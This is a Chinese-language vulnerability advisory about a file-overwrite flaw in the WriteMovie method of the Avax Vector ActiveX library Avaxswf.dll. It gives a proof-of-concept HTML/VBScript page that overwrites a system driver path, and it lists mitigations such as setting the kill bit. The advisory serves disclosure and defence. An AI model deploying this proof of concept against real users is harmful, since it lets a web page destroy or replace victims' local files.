发布日期：2007-06-26
更新日期：2007-06-27

受影响系统：

Avax Vector Avaxswf.dll 1.0.0.1

描述：

---

BUGTRAQ  ID: 24659

AVAX是用于二维绘图的ActiveX工具，Avaxswf.dll是其中捆绑的一个函数库。

Avaxswf.dll库的实现上存在漏洞，远程攻击者可能利用此漏洞覆盖系统上的文件。

Avaxswf.dll库的WriteMovie方式无法确定是由应用程序还是由恶意用户调用，如果用户受骗访问了恶意站点就可能导致覆盖任意本地文件。

<*来源：callAX （callax@shellcode.com.ar）
  
  链接：http://marc.info/?l=bugtraq&m=118288946327235&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<object classid='clsid:0DD77391-686B-11D4-B367-D4475FDFF33A'
id='wRit3'></object>
<input language=VBScript onclick=Boom() type=button value="Write">

<script language = 'vbscript'>

sub Boom()

   f1l3 = "C:\WINDOWS\system32\drivers\hackme.sys"

   wRit3.WriteMovie f1l3

End Sub

</script>

建议：

---

临时解决方法：

* 为clsid: 0DD77391-686B-11D4-B367-D4475FDFF33A设置Kill bit
* 使用regsvr32注销Avaxswf.dll

厂商补丁：

Avax Vector
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://business.hol.gr/gardos/index.htm

浏览次数：2646
严重程度：0（网友投票）